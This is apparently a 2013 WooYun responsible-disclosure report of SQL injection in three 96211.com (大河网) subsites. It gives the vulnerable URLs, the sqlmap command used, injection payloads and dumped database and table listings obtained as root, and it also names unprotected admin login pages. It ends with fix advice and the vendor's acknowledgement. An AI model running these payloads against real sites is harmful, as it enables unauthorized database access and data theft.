大河网#3个分站存在SQL注射漏洞（root用户）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044193

漏洞标题：大河网#3个分站存在SQL注射漏洞（root用户）

漏洞作者： Mr.leo

提交时间：2013-11-27 13:42

修复时间：2014-01-11 13:43

公开时间：2014-01-11 13:43

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-27：细节已通知厂商并且等待厂商处理中
2013-11-27：厂商已经确认，细节仅向厂商公开
2013-12-07：细节向核心白帽子及相关领域专家公开
2013-12-17：细节向普通白帽子公开
2013-12-27：细节向实习白帽子公开
2014-01-11：细节向公众公开

简要描述：

大河网#3个分站存在SQL注射漏洞（root用户）求RANK20

详细说明：

站点1：
http://jlb.96211.com 大河读者报俱乐部
id参数没有过滤，导致注射漏洞
http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398
sqlmap跑起来
sqlmap.py -u "http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=398 AND 9028=9028
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: Id=398 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x
3a626f623a,0x4e584145674d79756773,0x3a6474613a), NULL, NULL, NULL, NULL, NULL, N
ULL, NULL#
---
[10:40:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[10:40:01] [INFO] fetching current user
current user: 'root@localhost'
[10:40:01] [INFO] fetching current database
current database: 'dahebao'
[10:40:01] [INFO] fetching database names
[10:40:01] [INFO] the SQL query used returns 17 entries
[10:40:01] [INFO] resumed: "information_schema"
[10:40:01] [INFO] resumed: "170"
[10:40:01] [INFO] resumed: "clubwap"
[10:40:01] [INFO] resumed: "cmswap"
[10:40:01] [INFO] resumed: "dahebao"
[10:40:01] [INFO] resumed: "dahevote"
[10:40:01] [INFO] resumed: "dvote"
[10:40:01] [INFO] resumed: "dvote_2"
[10:40:01] [INFO] resumed: "ebvote"
[10:40:01] [INFO] resumed: "guozheng"
[10:40:01] [INFO] resumed: "love"
[10:40:01] [INFO] resumed: "mysql"
[10:40:01] [INFO] resumed: "php168"
[10:40:01] [INFO] resumed: "phpcms"
[10:40:01] [INFO] resumed: "phpcms2010"
[10:40:01] [INFO] resumed: "test"
[10:40:01] [INFO] resumed: "tuan"
root用户

available databases [17]:
[*] 170
[*] clubwap
[*] cmswap
[*] dahebao
[*] dahevote
[*] dvote
[*] dvote_2
[*] ebvote
[*] guozheng
[*] information_schema
[*] love
[*] mysql
[*] php168
[*] phpcms
[*] phpcms2010
[*] test
[*] tuan
Database: dahebao
[48 tables]
+----------------+
| about_m |
| adm |
| am_tree |
| am_user |
| ar_advertise |
| ar_article |
| ar_articledata |
| ar_articletype |
| ar_catalog |
| ar_comment |
| ar_config |
| ar_file |
| ar_keywords |
| ar_links |
| ar_members |
| ar_message |
| ar_page |
| ar_tags |
| areas |
| baoliao |
| baoming |
| buycar_m |
| emaillm |
| emailsm |
| gmm |
| gmyes |
| hzshm |
| hzshs |
| jiuyou |
| kefu_m |
| keywd |
| link_m |
| liren |
| liuyan_text |
| mem_m |
| mem_store |
| news_m |
| pinpm |
| prodm |
| prodmpic |
| prodmpl |
| prodmtao |
| prodmwd |
| prods |
| toorder_m |
| toorderlw |
| wenda |
| xiaojizhe |
+----------------+
------------------------我是分割线----------------------------------
站点2：
http://dhtuan.96211.com 国政大河商城
同样是id参数没有过滤，导致注射漏洞
http://dhtuan.96211.com/Previous/SiteProd/ProdM_List.php?Id=432
跑sqlmap
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=432 AND 9896=9896
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: Id=432 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6a617a3a,0x6a696253766
74c76434e,0x3a6e68663a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: Id=432 AND SLEEP(5)
---
[12:42:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[12:42:09] [INFO] fetching current user
current user: 'root@localhost'
[12:42:09] [INFO] fetching current database
current database: 'guozheng'
[12:42:09] [INFO] fetching database names
[12:42:09] [INFO] the SQL query used returns 17 entries
[12:42:09] [INFO] resumed: "information_schema"
[12:42:09] [INFO] resumed: "170"
[12:42:10] [INFO] resumed: "clubwap"
[12:42:10] [INFO] resumed: "cmswap"
[12:42:10] [INFO] resumed: "dahebao"
[12:42:10] [INFO] resumed: "dahevote"
[12:42:10] [INFO] resumed: "dvote"
[12:42:10] [INFO] resumed: "dvote_2"
[12:42:10] [INFO] resumed: "ebvote"
[12:42:10] [INFO] resumed: "guozheng"
[12:42:10] [INFO] resumed: "love"
[12:42:10] [INFO] resumed: "mysql"
[12:42:10] [INFO] resumed: "php168"
[12:42:10] [INFO] resumed: "phpcms"
[12:42:10] [INFO] resumed: "phpcms2010"
[12:42:10] [INFO] resumed: "test"
[12:42:10] [INFO] resumed: "tuan"
同样是root用户

available databases [17]:
[*] 170
[*] clubwap
[*] cmswap
[*] dahebao
[*] dahevote
[*] dvote
[*] dvote_2
[*] ebvote
[*] guozheng
[*] information_schema
[*] love
[*] mysql
[*] php168
[*] phpcms
[*] phpcms2010
[*] test
[*] tuan
Database: guozheng
[35 tables]
+--------------+
| about_m |
| adm |
| am_tree |
| am_user |
| areas |
| baoming |
| buycar_m |
| buycar_m_jf |
| emaillm |
| emailsm |
| gmm |
| gmyes |
| hzshm |
| hzshs |
| kefu_m |
| keywd |
| link_m |
| liuyan_text |
| mem_m |
| mem_store |
| news_m |
| pinpm |
| prodm |
| prodm_jf |
| prodmpic |
| prodmpic_jf |
| prodmpl |
| prodmtao |
| prodmwd |
| prods |
| prods_jf |
| toorder_m |
| toorder_m_jf |
| toorderlw |
| wenda |
+--------------+
------------------------------我是分割线-------------------------------
站点3：
http://pw.96211.com 大河票务在线
id没有过滤，导致注射
http://pw.96211.com/Previous/SiteProd/ProdM_List_yc.php?Id=248
sqlmap跑起来
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=248 AND 4067=4067
---
[11:06:38] [INFO] testing MySQL
[11:06:51] [INFO] confirming MySQL
[11:07:13] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[11:07:13] [INFO] fetching current user
[11:07:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:07:13] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:26:31] [INFO] fetching current database
[11:26:31] [INFO] retrieved: dahebao
current database: 'dahebao'
[11:36:11] [INFO] fetching database names
[11:36:11] [INFO] fetching number of databases
[11:36:11] [INFO] retrieved: 17
[11:37:51] [INFO] retrieved: information_schema
[12:01:25] [INFO] retrieved: 170
[12:06:14] [INFO] retrieved: clubwap
[12:16:03] [INFO] retrieved: cmswap
[12:24:34] [INFO] retrieved: dahebao
[12:34:16] [INFO] retrieved: dahevote
太慢了，没有深入。
root用户

附送2个后台，没有验证码，没有深入，存在被暴力破解。
http://dhfx.96211.com/Admin/Frame/LoginA.php
大河报读者俱乐部 96211 - 管理员入口
http://t.96211.com/manage/login.php
大河团 - 管理后台

漏洞证明：

已经证明。

修复方案：

1#过滤参数
2#屏蔽外网直接访问到管理后台
3#找洞很辛苦，求RANK20

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2013-11-27 13:44

厂商回复：

通知了合作单位。谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044193

漏洞标题：大河网#3个分站存在SQL注射漏洞（root用户）

相关厂商：大河网

漏洞作者： Mr.leo

提交时间：2013-11-27 13:42

修复时间：2014-01-11 13:43

公开时间：2014-01-11 13:43

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044193

漏洞标题：大河网#3个分站存在SQL注射漏洞（root用户）

相关厂商：大河网

漏洞作者： Mr.leo

提交时间：2013-11-27 13:42

修复时间：2014-01-11 13:43

公开时间：2014-01-11 13:43

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-044193"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：